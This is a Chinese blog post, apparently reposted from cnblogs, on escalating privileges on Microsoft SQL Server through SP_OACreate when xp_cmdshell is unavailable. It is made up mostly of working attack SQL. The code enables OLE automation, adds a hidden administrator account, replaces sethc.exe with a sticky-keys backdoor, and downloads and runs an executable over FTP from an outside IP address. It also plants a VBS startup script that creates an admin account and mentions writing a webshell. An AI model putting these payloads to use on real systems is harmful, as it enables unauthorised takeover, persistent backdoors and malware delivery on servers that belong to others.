zoukankan      html  css  js  c++  java

  • SP_OACreate提权经验

    在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权

     
    首先
     
    EXEC sp_configure 'show advanced options', 1;  
    RECONFIGURE WITH OVERRIDE;  
    EXEC sp_configure 'Ole Automation Procedures', 1;  
    RECONFIGURE WITH OVERRIDE;  
    EXEC sp_configure 'show advanced options', 0;
     
    打开组件,2005中默认关闭
     
    1)直接加用户
     
    2000系统:
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net user 123 123 /add'
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net localgroup administrators 123/add'
     
      
     
    xp和2003系统:
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user 123$ 123/add'
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators 123$ /add'
     
      
     
    2)粘贴键替换
     
    declare @o int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
     
    declare @o int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe';
     
    需要同时具备sp_oacreate 和sp_oamethod 两个功能组件
     
    3)直接传马
     
    DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%system32cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--
     
    4)启动项写入加账户脚本
     
    declare @sp_passwordxieo int, @f int, @t int, @ret int
    exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
    exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:RECYCLER1.vbs', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
    exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
     
    5)如果该服务器有网站,则直接用方法4)写入一句话
  • 相关阅读:
    windows 保留7天的文件
    同步
    bytes数据类型的转码问题:
    hashlib,logging,configparser模块
    面向对象 ---封装
    面向对象 -----多态
    面向对象 ---继承
    面向对象的命名空间与组合
    常用模块:
    匿名函数:
  • 原文地址:https://www.cnblogs.com/xishaonian/p/7421592.html
Copyright © 2011-2022 走看看